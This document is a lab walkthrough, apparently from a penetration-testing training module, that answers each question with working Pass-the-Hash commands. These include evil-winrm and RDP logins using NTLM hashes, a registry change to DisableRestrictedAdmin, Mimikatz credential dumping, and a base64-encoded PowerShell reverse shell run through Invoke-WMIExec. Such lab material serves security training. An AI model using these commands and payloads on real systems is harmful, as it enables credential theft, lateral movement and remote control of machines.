Skip to content

Pass the Hash (PtH)

ℹ️ Informations

Question

Access the target machine using any Pass-the-Hash tool. Submit the contents of the file located at C:\pth.txt.

Provided credentials: Administrator:30B3783CE2ABF1AF70F77D0660CF3453

📋 Walkthrough

evil-winrm -i 10.129.167.241  -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
Answer

[REDACTED]

Question

Try to connect via RDP using the Administrator hash. What is the name of the registry value that must be set to 0 for PTH over RDP to work? Change the registry key value and connect using the hash with RDP. Submit the name of the registry value name as the answer.

📋 Walkthrough

xfreerdp /v:10.129.167.241 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453
It gaves to us Account restrictions. Use this command using evil-winrm 
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Retry.

Answer

DisableRestrictedAdmin

Question

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

📋 Walkthrough

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Answer

[REDACTED]

Question

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.

📋 Walkthrough

sekurlsa::pth /user:David /ntlm:[HASH] /domain:INLANEFREIGHT /run:cmd.exe
Now find the flag using this: 
net use Z: \\DC01\david /user:David
type Z:\david.txt

Answer

[REDACTED]

Question

Using Julio's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\julio and read the file julio.txt.

📋 Walkthrough

Hashes:
a::pth /user:David /ntlm:c39f2beb3d2ec06a62cb887fb391dee0 /domain:INLANEFREIGHT /run:cmd.exe
sekurlsa::pth /user:julio /ntlm:64f12cddaa88057e06a81b54e73b949b /domain:INLANEFREIGHT /run:cmd.exe
sekurlsa::pth /user:john /ntlm:c4b0e1b10c7ce2c4723b4e2407ef81a2 /domain:INLANEFREIGHT /run:cmd.exe
Get the hash from the previous output. 
net use S: \\DC01\julio /user:Julio
type Z:\julio.txt

Answer

[REDACTED]

Question

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

📋 Walkthrough

.\Invoke-WMIExec -Target DC01 -Domain INLANEFREIGHT -Username julio -Hash [HASH] -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAOAAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
Answer

[REDACTED]